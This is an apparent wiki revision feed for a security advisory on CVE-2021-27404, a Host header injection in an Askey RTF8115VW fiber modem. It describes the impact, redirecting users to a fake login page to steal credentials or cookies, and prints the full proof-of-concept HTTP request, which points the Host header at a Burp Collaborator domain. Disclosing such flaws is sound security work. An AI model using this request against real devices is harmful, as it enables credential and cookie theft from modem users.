https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-27404_Authenticated_Host%E6%A8%99%E9%A0%AD%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2021-27404 Authenticated Host標頭注入漏洞 - Revision history
2026-04-04T13:44:01Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-27404_Authenticated_Host%E6%A8%99%E9%A0%AD%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=809&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> **Authenticated Host Header Injection - Askey Internet Fiber Modem** Vendor: **Askey** Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014** Model: **R..."
2021-03-31T07:35:54Z
<p>Created page with "==INFO== <pre> **Authenticated Host Header Injection - Askey Internet Fiber Modem** Vendor: **Askey** Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014** Model: **R..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
**Authenticated Host Header Injection - Askey Internet Fiber Modem**<br />
<br />
Vendor: **Askey** <br />
Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014** <br />
Model: **RTF8115VW** <br />
Vulnerable Header: **Host** <br />
Not tested in other model/version. <br />
<br />
Impact: An attacker could take advantege on that vulnerability to redirect user to a fake Login page in order to extract his credentials, or cookies.<br />
<br />
The Final Request<br />
```<br />
GET / HTTP/1.1<br />
Host: kay4tb35bh55y38n8h4teim21t7jv8.burpcollaborator.net<br />
Cookie: _httpdSessionId_=7924107467ea5838a196b65306ca7236<br />
Upgrade-Insecure-Requests: 1<br />
Referer: http://x.x.x.x/cgi-bin/te_logout.cgi<br />
Accept: */*<br />
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36<br />
Connection: close<br />
Cache-Control: max-age=0<br />
Accept-Encoding: gzip, deflate<br />
```<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
</pre></div>
Pwnwiki